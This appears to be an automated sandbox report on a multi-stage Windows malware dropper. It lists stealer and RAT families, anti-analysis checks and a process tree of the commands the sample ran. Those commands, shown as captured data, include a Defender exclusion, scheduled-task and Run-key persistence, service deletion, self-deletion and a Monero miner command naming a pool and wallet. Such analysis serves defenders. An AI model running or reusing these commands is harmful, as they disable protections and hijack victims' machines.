Analysis Overview
SHA256
fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9
Threat Level: Known bad
The file fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9 was found to be: Known bad.
Malicious Activity Summary
ZGRat
StormKitty payload
StormKitty
Lumma Stealer
Detect Xworm Payload
Stealc
RedLine payload
RisePro
Detect ZGRat V1
Amadey
RedLine
Contains code to disable Windows Defender
Xworm
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Stops running service(s)
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Executes dropped EXE
Checks computer location settings
Checks BIOS information in registry
Identifies Wine through registry keys
Themida packer
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Program crash
Unsigned PE
Enumerates physical storage devices
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-13 19:23
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-13 19:23
Reported
2024-05-13 19:26
Platform
win10v2004-20240508-en
Max time kernel
50s
Max time network
135s
Command Line
Signatures
Amadey
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
Stealc
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\1000006002\698639580a.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\1000006002\698639580a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\1000006002\698639580a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Temp\959566.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\698639580a.exe = "C:\\Users\\Admin\\1000006002\\698639580a.exe" | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\1000006002\698639580a.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2648 set thread context of 3940 | N/A | C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1132 set thread context of 2200 | N/A | C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2256 set thread context of 3760 | N/A | C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe | C:\Windows\Temp\734713.exe |
| PID 2408 set thread context of 4412 | N/A | C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4584 set thread context of 2008 | N/A | C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\installc.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\installm.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\GameService.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\installm.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\installg.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\installc.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\installg.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\GameService.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\explorku.job | C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe | N/A |
| File created | C:\Windows\Tasks\axplons.job | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe
"C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe"
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
C:\Users\Admin\1000006002\698639580a.exe
"C:\Users\Admin\1000006002\698639580a.exe"
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2648 -ip 2648
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 348
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClient
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClient confirm
C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLink confirm
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
C:\Windows\Temp\959566.exe
"C:\Windows\Temp\959566.exe" --list-devices
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClientC
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClientC confirm
C:\Windows\SysWOW64\sc.exe
Sc delete PiercingNetLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove PiercingNetLink confirm
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start PiercingNetLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLinks
C:\Users\Admin\Pictures\KZZeU9AHXMfM49m0CgST8jIQ.exe
"C:\Users\Admin\Pictures\KZZeU9AHXMfM49m0CgST8jIQ.exe"
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLinks confirm
C:\Users\Admin\Pictures\kCFEMhAQIuBTEcADzWlIq9oG.exe
"C:\Users\Admin\Pictures\kCFEMhAQIuBTEcADzWlIq9oG.exe" /s
C:\Users\Admin\Pictures\729sMxALJLzws7AUIJ2dH5VM.exe
"C:\Users\Admin\Pictures\729sMxALJLzws7AUIJ2dH5VM.exe"
C:\Users\Admin\Pictures\vRfmkKE5YjUZoqiydosnC5gL.exe
"C:\Users\Admin\Pictures\vRfmkKE5YjUZoqiydosnC5gL.exe"
C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe
"C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"
C:\Users\Admin\Pictures\MW5T1CszwA2SFSFEi70TlFaV.exe
"C:\Users\Admin\Pictures\MW5T1CszwA2SFSFEi70TlFaV.exe"
C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe"
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLinks
C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
C:\Windows\Temp\734713.exe
"C:\Windows\Temp\734713.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe'
C:\Users\Admin\Pictures\7Hswff1vVcJEkZx6ERuw0xeI.exe
"C:\Users\Admin\Pictures\7Hswff1vVcJEkZx6ERuw0xeI.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Users\Admin\Pictures\qTEX7szWEBVUj0CUAxUkEmMV.exe
"C:\Users\Admin\Pictures\qTEX7szWEBVUj0CUAxUkEmMV.exe"
C:\Users\Admin\AppData\Local\Temp\7zS2CA9.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
